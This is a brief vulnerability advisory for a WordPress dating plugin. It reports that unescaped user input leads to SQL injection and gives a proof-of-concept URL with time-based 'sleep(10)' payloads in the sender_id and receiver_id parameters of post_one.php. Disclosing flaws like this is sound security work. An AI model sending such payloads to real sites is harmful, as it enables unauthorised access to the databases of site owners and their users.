The plugin does not properly escape user input before concatenating it to certain SQL queries, leading to multiple SQL injection vulnerabilities.
http://vulnerable-site.tld/wp-content/plugins/dsp_dating/m1/post_one.php?sender_id=(sender_id*sleep(10))&receiver;_id=(sender_id*sleep(10))